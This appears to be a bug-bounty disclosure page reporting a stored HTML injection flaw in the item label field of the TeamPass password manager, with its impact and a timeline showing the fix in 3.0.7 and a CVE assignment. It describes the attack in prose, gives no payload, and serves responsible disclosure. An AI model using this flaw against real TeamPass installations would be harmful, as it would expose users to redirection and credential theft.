Stored HTML Injection in Item Label in nilsteampassnet/teampass

Valid

Reported on

May 7th 2023

Description

If two users have the same folder access, malicious users can create an item where its label field is vulnerable to HTML injection. When other users see that item, it may force them to redirect to the attacker's website or capture their data using a form.

Proof of Concept

https://drive.google.com/file/d/1UkeRtAAIhwYTxvVCSrIozCUDukhrlVBT/view

Impact

Malicious users could potentially exploit the vulnerability in the label field of an item to carry out an HTML injection attack, which could redirect other users to an attacker's website or capture their sensitive data through a form. This could result in a variety of negative consequences, including the theft of confidential information, financial loss, and reputational damage to the affected users or organizations. Additionally, the attack could spread further, affecting other users who interact with the compromised item or website, leading to a wider breach of security.

References

https://huntr.dev/bounties/a3c506f0-5f8a-4eaa-b8cc-46fb9e35cf7a/

We are processing your report and will contact the nilsteampassnet/teampass team within 24 hours. 18 days ago

We have contacted a member of the nilsteampassnet/teampass team and are waiting to hear back 17 days ago

Nils Laumaillé validated this vulnerability 16 days ago

M Nadeem Qazi has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Nils Laumaillé marked this as fixed in 3.0.7 with commit 57a977 16 days ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

Nils Laumaillé published this vulnerability 16 days ago

Nils Laumaillé gave praise 16 days ago

Thank you 👍

The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1

M Nadeem Qazi

commented 16 days ago

Researcher

Thanks

to join this conversation